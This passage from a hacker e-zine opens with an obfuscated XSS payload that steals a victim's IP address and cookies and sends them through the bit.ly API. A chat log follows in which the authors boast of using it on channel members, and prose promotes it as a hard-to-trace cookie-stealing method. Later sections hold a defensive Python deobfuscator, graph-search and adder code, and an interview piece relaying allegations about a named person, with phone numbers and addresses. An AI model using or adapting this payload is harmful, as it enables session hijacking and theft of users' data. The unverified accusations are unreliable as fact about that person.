7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,62,101,108,99,104,117,112,97,1 17,104,105,110,103,121,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,99,53,98, 
101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,102,111,114,109,97,116,61,10 6,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,47,103,111,111,103,108,1 01,46,99,111,109,47,115,101,97,114,99,104,63,113,61).concat(document.cookie)); Silks: so since I've woke up and elchu found the ip, I'm gonna combine both of them so it will store an IP in a bit.ly account Barney-: ya but in what type of attack scenario would IP be helpful? Silks: was saying before, obviously we can just store all this info in the same way I did with my XSS session stealer. call a .php and store it in a db Barney-: dont get me wrong its cool, just wondering application Barney-: could do it easier Barney-: and be like Barney-: hey visit www.silks.com/index.php?id=4 (where id isn't even a var...) Barney-: it'll 404, and show up in access_log Barney-: voila Silks: hence what I said above but yeah Silks: this is just a way of doing it without any hosting etc Barney-: true Silks: and pretty interesting to be storing info in bit.ly links Silks: that page wouldn't 404 if you just added a get var Silks: funny thing is, when you've made the full XSS you can just package it up in a bit.ly Silks: elchu posted it in #gny and a couple of people clicked and didn't even understand what happened Silks: specifically, Compound and jmp got XSS'ed and knew no better Barney-: hahah Barney-: a bit.ly starts the XSS Barney-: and ends up in a bit.ly Barney-: hence why I don't trust you Barney-: and i go curl -I silks-dumb-links.com Silks: almost done Silks: gonna own #gny Silks: Barney- Silks: mind testing this? 
Silks: http://bit.ly/e93lCU Silks: bit.ly/gvZPM8 Barney-: Location: http://ads.clicksor.com/newServing/yesupSearch/web.php?q= Barney-: MIME-Version: 1.0 Barney-: Content-Length: 1177 Barney-: how do you pass a mime-version Barney-: with no mime type Silks: probably to do with the bit.ly link elchupathingy: just woke up Silks: tricked a few people lolz elchupathingy: ya saw elchupathingy: i was happy with the ip lol elchupathingy: but having to add in the random ass semicolons was annoying Silks: I'm thinking it might be possible to use browser location tracking to grab data elchupathingy: probably Silks: you know the browser sends a list of all the access points and macs near you Silks: crazy shit Silks: then you can use those macs with google api to triangulate your position elchupathingy: never tried to use it Silks: crazy how much data your browser sends though elchupathingy: ya Silks: would be lol to XSS->triangulated position Silks: similar shit to what samy did Silks: but without being a fucking tool elchupathingy: heh elchupathingy: well you can get it but ff asks for permission to get the lat,lng Silks: yeah Silks: but if location tracking is enabled it goes through elchupathingy: true then its fucking simple lol Silks: you're fucking simple Silks: think only in the past 6 months-year they started asking users tbh elchupathingy: function loc(p) { alert( p ); }navigator.geolocation.getCurrentPosition(loc); elchupathingy: er elchupathingy: function loc(p){alert(p.coords.latitude+","+p.coords.longitude);};navigator.geolocati on.getCurrentPosition(loc); Silks: listening to that song you stole from my cookies d4rK3r: who is more awesome then i? 
http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest ()%3bx.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47% 2c47%2c97%2c112%2c105%2c46%2c104%2c111%2c115%2c116%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue) %3bx.onreadystatechange%3dfunction()%7bif(x.readyState%3d%3d4)%7bvar+ip+%3d+x.responseText.match(new +RegExp(String.fromCharCode(92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44 %2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c5 1%2c125)))%3bvar+y+%3d+new+XMLHttpRequest()%3by.onreadystatechange+%3d+function()%7bif(y.readyState% 3d%3d4)window.location%3dString.fromCharCode(103%2c116%2c116%2c112%2c58%2c47%2c47%2c98%2c105%2c116.. ..d%3by.open(+String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c4 7%2c47%2c97%2c112%2c105%2c46%2c98%2c105%2c116%2c108%2c121%2c46%2c99%2c111%2c109%2c47%2c118%2c51%2c47 %2c115%2c104%2c111%2c114%2c116%2c101%2c110%2c63%2c108%2c111%2c103%2c105%2c110%2c61%2c101%2c108%2c99% 2c104%2c117%2c112%2c97%2c116%2c104%2c105%2c110%2c103%2c...57%2c99%2c99%2c57%2c102%2c48%2c98%2c50%2c5 3%2c50%2c52...c61%2c106%2c115%2c111%2c110%2c38%2c108%2c111%2c110%2c103%2c85%2c114%2c108%2c61%2c104%2 c116%2c116%2c112%2c58%2c47%2c47%2c103%2...2c97%2c114%2c99%2c104%2c63%2c113%2c61).concat(ip).concat(d ocument.cookie))%3by.send()%3b%7d%3b%7d%3bx.send()%3b%3c%2fscript%3e

The XSS string shown above is the final product of the above discussion. It grabs the user's IP and cookie and uses the bit.ly storage method also outlined above. The simple bit.ly API makes this method of cookie grabbing simple and effective: retrieving the cookie information is a single request to the bit.ly service, and all of the relevant information is returned in an XML or JSON string.
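As an added example (not the zine's or its authors' code), here is how a defender can read a payload built the way the one above is: percent-decode it, turn every String.fromCharCode(...) back into the string it builds, and list the hosts it contacts and the browser objects it touches. The sample payload is constructed here in the same shape as the string above and is not the zine's full string.

```python
import json
import re
from urllib.parse import unquote_plus

# Constructed sample (not the zine's full string): same shape as the payload
# above, URL-encoded for a ?q= parameter, with the real hostnames hidden
# behind String.fromCharCode() and the cookie appended to the second request.
SAMPLE = (
    "%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest()%3b"
    "x.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116"
    "%2c116%2c112%2c58%2c47%2c47%2c97%2c112%2c105%2c46%2c104%2c111%2c115%2c116"
    "%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue)%3bx.send()%3b"
    "var+y+%3d+new+XMLHttpRequest()%3b"
    "y.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116"
    "%2c116%2c112%2c58%2c47%2c47%2c97%2c112%2c105%2c46%2c98%2c105%2c116%2c108"
    "%2c121%2c46%2c99%2c111%2c109%2c47).concat(document.cookie)%2ctrue)%3b"
    "y.send()%3b%3c%2fscript%3e"
)

FROMCHARCODE = re.compile(r"String\.fromCharCode\(([^)]*)\)")
URL = re.compile(r"https?://[^\s'\"<>]+")
# Browser objects worth flagging when triaging what a script can reach
SENSITIVE = ("document.cookie", "XMLHttpRequest", "window.location",
             "navigator.geolocation")


def decode_fromcharcode(js):
    """Rewrite every String.fromCharCode(...) call into the string literal it builds.

    Non-numeric tokens (for example the "..." where the zine elided part of
    the payload) are kept visible as <token> instead of being silently dropped.
    """
    def build(match):
        out = []
        for tok in match.group(1).split(","):
            tok = tok.strip()
            if tok.isdigit():
                out.append(chr(int(tok)))
            elif tok:
                out.append("<%s>" % tok)
        # json.dumps yields a valid JS string literal (quotes/backslashes escaped)
        return json.dumps("".join(out))
    return FROMCHARCODE.sub(build, js)


def analyze_payload(encoded):
    """Percent-decode a query-string payload, deobfuscate it and summarize it."""
    script = decode_fromcharcode(unquote_plus(encoded))
    hosts = sorted({re.sub(r"^https?://", "", u).split("/")[0]
                    for u in URL.findall(script)})
    reads = [name for name in SENSITIVE if name in script]
    return {"script": script, "hosts": hosts, "reads": reads}


if __name__ == "__main__":
    report = analyze_payload(SAMPLE)
    print(report["script"])
    print("contacts:", ", ".join(report["hosts"]))
    print("touches:", ", ".join(report["reads"]))
```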
Duplicate entries are effectively nulled by how bit.ly hashes the URL to create its shortened ones. Accounts are easily created, and thus the links and storing of information can be distributed amongst many different bit.ly accounts. This makes it much harder to find the sole source of the links. A combination with other URL shortening services such as goo.gl, on.fb.me, and tinyurl can make this a very robust method of cookie stealing. The XSS string above can be tweaked to hide its real intentions and can effectively work against someone who does not question links sent to them. A major weakness of this technique is that it relies on JavaScript, so browsers that employ NoScript will not be affected, but utilizing other standard XSS techniques and server-side files could ensure that if you can't grab both the IP and the cookie, you can at least grab an IP.

As simple as this technique may be, there is a lot more potential for further privacy and security breaches if you can think outside the box. Not to mention that we think storing data in bit.ly is pretty hilarious.

[==================================================================================================]

-=[ 0x0c Programming Challenge
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

Sorry, no programming challenge this issue. If you have ideas, don't hesitate to shoot us an email.

--------------------------------------------------------------------------------

Last issue, we asked readers to compare the depth-first search and breadth-first search routing algorithms against a given graph.
Graph Solution by melte
Language: Perl
--------------------

#!/usr/bin/perl
use strict;
use warnings;

my $obj = { points => build_tree(<DATA>) };

# Uncomment for examples given in the article
=pod
for ('C', 'D', 'E') {
    my $end = breadth_first($obj, 'A', $_);
    my $mid = depth_first($obj, 'A', $_);
    print "A -> $_ : DF=$mid BF=$end\n";
}
exit;
=cut

for my $first (sort { $a cmp $b } keys %{$obj->{points}}) {
    for my $second (sort { $a cmp $b } keys %{$obj->{points}}) {
        my $df = depth_first($obj, $first, $second);
        my $bf = breadth_first($obj, $first, $second);
        my $message = ($df != -1 && $df < $bf) ? "Depth-First"
                    : ($df > $bf && $bf != -1) ? "Breadth-First"
                    : "Tie";
        print "$first -> $second : DF=$df, BF=$bf : $message\n";
    }
}

# The data structure I'm using is a hashref with letters as keys,
# and an arrayref (as the value) listing its neighbours
sub build_tree {
    my (@input) = @_;
    my $vertex = {};
    # Not strictly necessary but this + the check below is good for catching typos
    while ($input[0] =~ /(\w+)[,}]/g) {
        $vertex->{$1} = [];
    }
    while ($input[1] =~ /\{(\w+)\,(\w+)\}/g) {
        defined $vertex->{$1} and defined $vertex->{$2}
            or die "Malformed point [$1,$2]";
        push @{$vertex->{$1}}, $2;
        push @{$vertex->{$2}}, $1;
    }
    $vertex;
}

# Setup the structure and enter recursion
sub depth_first {
    my ($obj, $start, $end) = @_;
    $obj = { checked => [], points => $obj->{points} };
    $start eq $end and return 0;
    _depth_first($obj, $start, $end);
}

# Check all trees from a starting point; returns the number of edges on the
# first path found (not necessarily the shortest), or -1 if none
sub _depth_first {
    my ($obj, $start, $end) = @_;
    defined $obj->{checked} or $obj->{checked} = [];
    push @{$obj->{checked}}, $start;
    for my $neighbour (sort { $a cmp $b } @{$obj->{points}{$start}}) {
        # We can exclude previously checked items
        grep { $_ eq $neighbour } @{$obj->{checked}} and next;
        push @{$obj->{checked}}, $neighbour;
        $neighbour eq $end and return 1;
        my $counter = _depth_first($obj, $neighbour, $end);
        $counter != -1 and return $counter + 1;
    }
    return -1;
}

# Surely there is a pretty and short recursive way to do this
sub breadth_first {
    my ($obj, $start, $end) = @_;
    $start eq $end and return 0;
    # Work on a sorted copy so the graph itself is left untouched
    my $tree = [ sort { $a cmp $b } @{$obj->{points}{$start}} ];
    my $level = 0;
    # Track what has already been queued, otherwise the frontier never empties
    # on a discontinuous graph and the loop below never terminates
    my %seen = map { $_ => 1 } ($start, @$tree);
    while (1) {
        ++$level;
        # With an unreachable target the frontier eventually runs dry
        @$tree or return -1;
        grep { $_ eq $end } @$tree and return $level;
        # We don't want to add items and then sort
        # We want to add sorted lists to preserve correct ordering
        my $temp = [];
        for my $item (sort { $a cmp $b } @$tree) {
            # Only queue nodes we have not reached yet
            push @$temp, grep { !$seen{$_}++ } @{$obj->{points}{$item}};
        }
        $tree = $temp;
    }
}

# Uncomment for smaller graph from article
=pod
__DATA__
V = {A,B,C,D,E}
E = {{A,B},{A,C},{B,C},{B,D},{B,E},{C,D},{D,E}}
__END__
=cut

__DATA__
V = {A,B,C,D,E,F,G,H}
E = {{A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}}

--------------------

$ perl graph.pl
A -> A : DF=0, BF=0 : Tie
A -> B : DF=1, BF=1 : Tie
A -> C : DF=5, BF=2 : Breadth-First
A -> D : DF=4, BF=1 : Breadth-First
A -> E : DF=6, BF=2 : Breadth-First
A -> F : DF=3, BF=1 : Breadth-First
A -> G : DF=2, BF=2 : Tie
A -> H : DF=3, BF=2 : Breadth-First
B -> A : DF=1, BF=1 : Tie
B -> B : DF=0, BF=0 : Tie
B -> C : DF=3, BF=3 : Tie
B -> D : DF=2, BF=2 : Tie
B -> E : DF=4, BF=3 : Breadth-First
B -> F : DF=3, BF=2 : Breadth-First
B -> G : DF=4, BF=1 : Breadth-First
B -> H : DF=5, BF=1 : Breadth-First
C -> A : DF=2, BF=2 : Tie
C -> B : DF=3, BF=3 : Tie
C -> C : DF=0, BF=0 : Tie
C -> D : DF=1, BF=1 : Tie
C -> E : DF=2, BF=1 : Breadth-First
C -> F : DF=5, BF=2 : Breadth-First
C -> G : DF=4, BF=3 : Breadth-First
C -> H : DF=5, BF=4 : Breadth-First
D -> A : DF=1, BF=1 : Tie
D -> B : DF=2, BF=2 : Tie
D -> C : DF=1, BF=1 : Tie
D -> D : DF=0, BF=0 : Tie
D -> E : DF=2, BF=1 : Breadth-First
D -> F : DF=4, BF=1 : Breadth-First
D -> G : DF=3, BF=2 : Breadth-First
D -> H : DF=4, BF=3 : Breadth-First
E -> A : DF=3, BF=2 : Breadth-First
E -> B : DF=4, BF=3 : Breadth-First
E -> C : DF=1, BF=1 : Tie
E -> D : DF=2, BF=1 : Breadth-First
E -> E : DF=0, BF=0 : Tie
E -> F : DF=6, BF=2 : Breadth-First
E -> G : DF=5, BF=3 : Breadth-First
E -> H : DF=6, BF=4 : Breadth-First
F -> A : DF=1, BF=1 : Tie
F -> B : DF=2, BF=2 : Tie
F -> C : DF=3, BF=2 : Breadth-First
F -> D : DF=2, BF=1 : Breadth-First
F -> E : DF=4, BF=2 : Breadth-First
F -> F : DF=0, BF=0 : Tie
F -> G : DF=3, BF=1 : Breadth-First
F -> H : DF=4, BF=2 : Breadth-First
G -> A : DF=2, BF=2 : Tie
G -> B : DF=1, BF=1 : Tie
G -> C : DF=4, BF=3 : Breadth-First
G -> D : DF=3, BF=2 : Breadth-First
G -> E : DF=5, BF=3 : Breadth-First
G -> F : DF=4, BF=1 : Breadth-First
G -> G : DF=0, BF=0 : Tie
G -> H : DF=2, BF=1 : Breadth-First
H -> A : DF=2, BF=2 : Tie
H -> B : DF=1, BF=1 : Tie
H -> C : DF=4, BF=4 : Tie
H -> D : DF=3, BF=3 : Tie
H -> E : DF=5, BF=4 : Breadth-First
H -> F : DF=4, BF=2 : Breadth-First
H -> G : DF=5, BF=1 : Breadth-First
H -> H : DF=0, BF=0 : Tie

By running this script, we can clearly see from the output that breadth-first search is the winning algorithm of the two on this graph: it always reports the shortest path, while depth-first search reports the length of whichever path it happens to stumble on first. However, this is not always the case. Some graphs will be better traversed by means of depth-first search, while others will not, so a judgment call must be made depending on the specific scenario. For instance, massive graphs with a target that is many hops away from the origin point will more likely be searched by depth-first search simply due to resource limitations. Breadth-first search of a massive graph has to hold every node of the current layer, and the layer being built from it, in memory at once. That "tree" of layers must be stored in memory, which will quickly run low as the tree grows, causing swapping to occur or the system to crash when the available RAM hits zero. With depth-first search, only a single "branch" of recursion is stored in memory, requiring much less space.

--------------------

Additionally, as an amendment to issue #3, we missed a solution submitted by Suzaku for the challenge of writing any one of a number of bit adders.
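One more note on the graph challenge before Suzaku's adder. As an added example (not melte's code), the Python below reads the same V=/E= input format, reproduces the DF/BF numbers in the table above (neighbours taken alphabetically, DF being the length of the first path depth-first finds, BF the shortest path), returns -1 on a disconnected graph instead of looping, and records the peak memory each search needed: the deepest recursion stack for depth-first and the widest frontier for breadth-first, which is the trade-off discussed above. The disconnected graph is constructed for the example.

```python
import re
from collections import deque

# The challenge graph, in the V=/E= format the Perl solution reads from __DATA__
CHALLENGE = """
V = {A,B,C,D,E,F,G,H}
E = {{A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}}
"""
# Constructed: C sits in its own component, so no search can reach it from A
DISCONNECTED = "V = {A,B,C}\nE = {{A,B}}"


def parse_graph(text):
    """Return {vertex: alphabetically sorted neighbours} from V=/E= lines."""
    graph = {}
    for line in text.splitlines():
        key, _, body = line.partition("=")
        key = key.strip()
        if key == "V":
            for v in re.findall(r"\w+", body):
                graph[v] = []
        elif key == "E":
            for a, b in re.findall(r"\{(\w+),(\w+)\}", body):
                if a not in graph or b not in graph:
                    raise ValueError("Malformed point [%s,%s]" % (a, b))
                graph[a].append(b)
                graph[b].append(a)
    for nbrs in graph.values():
        nbrs.sort()
    return graph


def depth_first(graph, start, end):
    """(edges on the first start->end path found, or -1; deepest stack used)."""
    if start == end:
        return 0, 0
    checked = {start}
    deepest = 0

    def walk(node, depth):
        nonlocal deepest
        deepest = max(deepest, depth)
        for nb in graph[node]:            # alphabetical order, like the Perl
            if nb in checked:
                continue
            checked.add(nb)
            if nb == end:
                return 1
            hops = walk(nb, depth + 1)
            if hops != -1:
                return hops + 1           # first path found, not the shortest
        return -1

    return walk(start, 1), deepest


def breadth_first(graph, start, end):
    """(shortest path length in edges, or -1; widest frontier held at once)."""
    if start == end:
        return 0, 0
    seen = {start}
    frontier = deque([(start, 0)])
    widest = 1
    while frontier:
        node, level = frontier.popleft()
        for nb in graph[node]:
            if nb in seen:
                continue
            if nb == end:
                return level + 1, widest
            seen.add(nb)
            frontier.append((nb, level + 1))
        widest = max(widest, len(frontier))
    return -1, widest                     # frontier ran dry: other component


def verdict(graph, a, b):
    """Same wording and tie-break as the Perl script's $message."""
    df, _ = depth_first(graph, a, b)
    bf, _ = breadth_first(graph, a, b)
    if df != -1 and df < bf:
        return "Depth-First"
    if bf != -1 and df > bf:
        return "Breadth-First"
    return "Tie"


def verdict_counts(graph):
    """How often each algorithm wins over every ordered pair of vertices."""
    counts = {"Depth-First": 0, "Breadth-First": 0, "Tie": 0}
    for a in graph:
        for b in graph:
            counts[verdict(graph, a, b)] += 1
    return counts


if __name__ == "__main__":
    g = parse_graph(CHALLENGE)
    for a in sorted(g):
        for b in sorted(g):
            (df, stack), (bf, width) = depth_first(g, a, b), breadth_first(g, a, b)
            print("%s -> %s : DF=%d (stack %d), BF=%d (frontier %d) : %s"
                  % (a, b, df, stack, bf, width, verdict(g, a, b)))
    print(verdict_counts(g))
```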
Ripple-Carry Adder by Suzaku
Language: Java
--------------------

import java.util.Scanner;

class adder{
    public static void main(String args[]){
        int bitS[],obA[],obB[],i,cin=0,cout=0;
        String bitA,bitB;
        char a,b;
        Scanner input=new Scanner(System.in);
        obA=new int[100];
        obB=new int[100];
        bitS=new int[100];
        System.out.println("Enter the bit pattern A");
        bitA=new StringBuffer(input.next()).reverse().toString();
        System.out.println("Enter the bit pattern B");
        bitB=new StringBuffer(input.next()).reverse().toString();
        if(bitA.length()==bitB.length()){
            System.out.print("Sum = ");
            for(i=0; i<bitA.length(); i++){
                // one full-adder stage per bit, least significant bit first
                a=bitA.charAt(i);
                b=bitB.charAt(i);
                obA[i]=a-'0';
                obB[i]=b-'0';
                bitS[i]=obA[i]^obB[i]^cin;
                cout=(obA[i]&obB[i])|(cin&(obA[i]^obB[i]));
                cin=cout;   // the carry ripples into the next stage
            }
            // the patterns were reversed on input, so print from the top down
            for(i=bitA.length(); i>0; i--)
                System.out.print(bitS[i-1]);
            System.out.print("\nCarry = "+cout);
        }
        else
            System.out.print("Length of A and B should be same");
    }
}

[==================================================================================================]

-=[ 0x0d The Scoop on LIGATT

LIGATT Security International (more commonly known as just LIGATT) is a security company founded and run by the (in)famous Gregory D. Evans. Evans is mainly known for his claim of being the "world's number 1 hacker" and his ability to teach anyone to be the same in 15 minutes through one of his company's educational courses. Much controversy surrounds Evans and his company, with allegations of severe debt, shady marketing schemes, and an overall lack of the security knowledge necessary to provide consulting services of any capacity. Attrition.org claims that Evans is currently in debt of over $9,000,000 USD, and the Better Business Bureau currently lists LIGATT as an 'F' rating. Evans denies all counts of misdoing and considers himself a wealthy, successful businessman.

In mid-January, Go Null Yourself Zine contacted LIGATT to request an interview with Evans. After a few days of conversation with Evans' PR assistant, the interview request was accepted. The interview spanned two days (due to phone difficulties), and about 2 hours and 10 minutes of conversation was recorded.
A detailed look at Evans' past was provided, and many shots were taken at the people and organizations calling him a fraud. There are simply too many details from the interview to enumerate here, so we have instead made the recordings public at http://www.gonullyourself.org/zine/4/ligatt for those who are interested.

After the interview, we contacted Attrition.org to get their take on everything told to us by Evans. We provided a list of key claims made by Evans, and this is their reply:

All of this is the best of my memory, or with citation if I have it.

: Evans lived in Germany in his youth and got in trouble for changing a
: friend's grades. The father of this friend, who was a lawyer, hired
: Evans (as a kid) to break into the computers of a competing law firm.

I think this is partially new. The 'changing grades' claim has been made before, but not with the additional details above.

: In 1994, Evans operated the 4th or 5th largest ISP in the country named
: Connect America financed by money made from hacking side-jobs. (I am
: unsure if he meant in America or Germany)

In the US, in California. Claims of the size are unverified, and I doubt they can be. The part about making money from hacking side-jobs is likely BS. During this time with Connect America, he was stealing phone lines and reselling them. This is basic toll fraud, and what led him to getting busted and serving 2 years in prison.

http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf

: Evans was friends with Kevin Mitnick in California, and they learned
: about computers and phreaking together.

This is a lie. Kevin Mitnick confirmed that while they were on the same floor of the LA detention center, they did not share a cell (as previously claimed by Evans), did not share any hacking / phreaking information, and did not learn from each other. Mitnick described Evans as someone who didn't seem to know much about hacking and asked basic questions. You can confirm this with a mail to Mitnick, and some of it is covered here:

http://attrition.org/errata/charlatan/gregory_evans/evans09.html
http://twitter.com/kevinmitnick/statuses/16428972158
http://twitter.com/kevinmitnick/statuses/16429370781

: Evans has 100 employees and has hired people in Pakistan and India.

This is hard to positively debunk, but I am relatively sure he does not have 100 employees currently. He has likely had 100 historically, but has a very high turnover rate. His claims of consultants in other countries make this basically impossible to verify, especially since he has not published financials for 2010 as required by the SEC.

: The term "number 1 hacker" came from Mr. Morris, the FBI agent that
: arrested Evans, who described Evans as on the "top 10 list of number 1
: hackers."

This is a new claim (re: Morris), but based on my experience with the FBI seems absurd. Evans was convicted of toll fraud, not really 'hacking'. At that time, the FBI had seen some pretty high end / impressive hacking, and what Evans was doing didn't come close.

: Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
: a $4 million house.

None of this can be verified so far, and we've tried. Given the apartments he has lived in for the last 2 years, as verified by ex-employees, it is unlikely he has had any significant money to do this. Based on court records we have published, he likely has never actually had 1 million dollars, just serious debt, including the ~ 10 million he still owes. Even now, he owes serious money not only for the previous crimes, but as a result of his business dealings the last few years. We have some of the records:

http://attrition.org/errata/charlatan/gregory_evans/ligatt15/

A summary of his debt:

http://attrition.org/errata/charlatan/gregory_evans/evans21.html

: Evans's book "Laptop Security" sold 150,000 copies.

We have not heard this claim. However, search Amazon for that title and look how many are available new/used, and it is likely false. It's curious he is focusing on that book, as all of his previous claims centered around the 'No 1 Hacker' book.

: The material found online in Evans's "No. 1 Hacker" book was not
: copyrighted and therefore was not legally forbidden to use.

This is patently false. The material he found online *was* copyrighted, even if the work did not explicitly say it was. This is copyright 101. There is currently a group of the authors that are still considering taking action against him. I have personally read mails from half a dozen of these authors that confirm they hold the copyright, and that they did NOT give him permission or sell it to him (as he claimed in other sources). A mail to Simple Nomad of NMRC will confirm this as one of the authors (who will reply and confirm, while others will not due to potential legal action).

: Evans was contracted to set up a CCTV camera network at a county prison
: while on probation.

Never heard this claim, but given how prisons work (and two direct family members that worked in that system), this is very dubious.

: Evans has committed "every type of high-tech crime you can ever think of
: before [he] was 26-years-old."

Again, his conviction was for basic toll fraud. This doesn't suggest any level of skill that would back this claim.

: In 1998, Evans was interrogated by the authorities regarding a
: system-wide crash of the SkyTel pager network.

No way to verify this short of a FOIA request for that case. I have not heard this claim before.

: Every time Evans was caught by the authorities, it was because someone
: else snitched on him.

The current court records do not suggest this. They do suggest that Evans was a snitch (see Mitnick's presentation last year about the topic). We have the docket for his big case online, and there is no mention of a snitch.

http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf
http://attrition.org/errata/charlatan/gregory_evans/ligatt07/

: "High-tech grand theft" is a new state crime that was formed
: specifically because of Evans's actions.

There is no state law that uses those words I bet =) Did he mean Georgia? How 'new'? This would be easy to verify unless he further spins the claim.

: There are plenty more points, but there's just too much stuff to listen
: to. It's not too bad of a list, anyways.

As usual, and it isn't just Evans, these types of claims are almost always made without any real detail, no verification from HIM, etc. Unfortunately, a lot of these are new claims or have new elements we haven't seen.

: I have also attached an email that Evans forwarded to me that may be of
: interest to you. Thank you again for your time, and I look forward to
: your response to these claims.

Yep, np! If you want to run any other claims by me, feel free. I will be offline for about 24 hours starting Thursday as I fly back to the states.

As for the e-mail, I have read it before actually via Don. It was not published on attrition.org because it is irrelevant to Evans' claims. Because he offered to buy a web site, doesn't mean any deal was made regarding publishing material written by Don. It does not speak to any agreement, purchase or transfer of copyright of text included in Evans book. So yes, it wasn't included on our site =)

As always, showing one thing that is marginally related to a piece of another story isn't proof, but it is an essential tool in a con.

- jericho

The attached email mentioned above can be read here. Evans forwarded this to us after the interview:

Sorry we got disconnected. Here is proof that I sent Donald an email asking to buy his website 6 months beforehand. Proving that there was no malicious intent. This is the stuff that they did not put on Attrition.org. Also if you want to finish up just let me know.
Begin forwarded message:

> From: "EH-Net-Don"
> Date: December 17, 2009 12:15:13 PM EST
> To: "'Gregory Evans'"
> Subject: [SPAM] RE: Purchase of Ethical Hacker Network
> Reply-To:
>
> Hey Gregory,
>
> Thank you very much for your kind words. It’s never a bad thing to have your blood, sweat and
> tears get recognized in a positive way. Although I’m not sure selling is my desire at the
> moment, I’m always willing to talk business and make new friends in the industry. Either way,
> you might be interested in getting the word out about your company and its products and
> services to a wider ethical hacking community. Maybe we could also chat about advertising on
> my site and/or supporting my ethical hacking conference, ChicagoCon. How’s that for a reverse
> pitch? ;-)
>
> If you don’t mind me asking, how did you find out about us?
>
> Looking forward,
> Don
>
> PS – There’s a typo in your LA address. Guess I can’t stop being an editor. :)
>
> Donald C. Donzal, CISSP, MCSE 2003, CEH, Security+ SME
> The Digital Construction Company
> 1520 Heidorn Ave.
> Westchester, IL 60154
> 708.837.3002 (Cell)
> Founder & Organizer
> ChicagoCon
> Editor-In-Chief
> The Ethical Hacker Network
>
>
>
> From: Gregory Evans [mailto:gregoryevans@ligatt.com]
> Sent: Wednesday, December 16, 2009 11:38 PM
> To: don@ethicalhacker.net
> Subject: Purchase of Ethical Hacker Network
>
> Hello Donzal,
>
> My name is Gregory Evans the CEO of LIGATT Security International (www.ligatt.com). I am very
> impressed with your website Ethical Hacker Network. I would love to speak to you sometime
> about purchasing the website and still having you run the site. If you are interested please
> feel to contact me at 866-354-4288 Ext. 5673.
>
> Have a Blessed Day,
>
> Gregory Evans
> President / CEO
>
> 866-354-4288 Ext. 5673
>
> Atlanta:
> 6050 Peachtree Parkway
> Suite 200
> Norcross, Ga 30092
>
> Los Angeles:
> 11209 Naitonal Blvd.
> Suite 178
> Los Angeles, Ca 90292
>

Have a Blessed Day,

Gregory Evans
President / CEO

Ring: 866-354-4288 Ext. 5673
Look: www.LIGATT.COM
Follow: www.twitter.com/ligatt
Post: www.facebook.com/GregoryDEvans

Atlanta
6050 Peachtree Parkway
Suite 200
Norcross, Ga 30092

As if there wasn't enough drama already, on February 2, a message was broadcast to the Full-Disclosure mailing list detailing the compromise of Evans' websites and email accounts, leaking hordes of personal and confidential information. We, personally, have taken little time to look through the leak and aren't able to better confirm or deny any claims made by Evans. There is most likely much to learn, though, according to Jericho:

: Thank you very much for providing insight on these claims. Would it be
: okay to publish this email in the zine? I think it would be interesting
: to place this side-by-side with the interview.

Yep, feel free. Also note, that with recent events (Evans' entire mail spool being leaked / published), some of these claims may be more thoroughly debunked in the coming weeks. As an example, his mail spool shows that he did register thecyberwars.com despite repeated claims he had nothing to do with it.

: > : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
: > : a $4 million house.
: >
: > None of this can be verified so far, and we've tried. Given the apartments
: > he has lived in for the last 2 years, as verified by ex employees, it is

A recent mail leaked from his spool shows that he could not even rent an apartment under his mom's name after they performed due diligence. When confronted with it, Evans libels attrition:

http://pastebin.com/J4JeG2W8

: > A summary of his debt:
: >
: > http://attrition.org/errata/charlatan/gregory_evans/evans21.html

Updated with another entry since this mail.

Also,

: Additionally, I found these the other day; you may also find them wildly
: amusing:
:
: http://www.theregister.co.uk/2011/01/31/ligatt_security_subpoena_quashed/

Already posted on the charlatan page.

: http://www.escapistmagazine.com/news/view/107413-Computer-Hackers-Getting-Their-Own-Reality-Show

He claims his life story was bought for a movie, that never materialized. As I tweeted the other day:

Hey @GregoryDEvans or @LIGATT .. any comment on why the last movie deal went nowhere? http://in.sys-con.com/node/927014

If he did get a reality show, why doesn't he name the network / company that bought it?

And,

: “I have to be modest and say that we at LIGATT could not have been able
: to do this without the help of Chris John Riley, Kris French, Sam Bowne,
: Elizabeth Summers, Atrrion.org, Crabbybastard.com and all the other
: people who kept our name relevant. What sealed the deal for us and got
: the networks to say, ‘lets do it’ was ‘LIGATTleaks’. Again, I have shown
: that what people may say about you or try to do to you does not stand in
: the way of my success. Success is the best revenge,” says Evans.
:
: Thought that was funny.

Yep, that is his new strategy for the last few weeks, he said the same thing in one of his recent video blogs as well.

-=-=-

If you would like to weigh in on the interview, the LIGATT controversy, or anything related to LIGATT, Gregory D. Evans, or the leak, our contact information is in the introduction - we will publish intelligent arguments and opinions (both for and against) in the next issue.

[==================================================================================================]

-=[ 0x0e Et Cetera, Etc.
-=[ Author: teh crew

In the absence of any real miscellaneous content, why not take a look at some of the shenanigans that go on in the good 'ol #gny. We're competent! We promise!
----------------------------------------------------------------------------------------------------
[16:22] It is expected on February 3rd, 2011, that there will be a formal announcement in the US that IPv4 addresses have been completely exhausted
[16:23] yes
[16:23] but they finished today
[16:23] who got the last one?
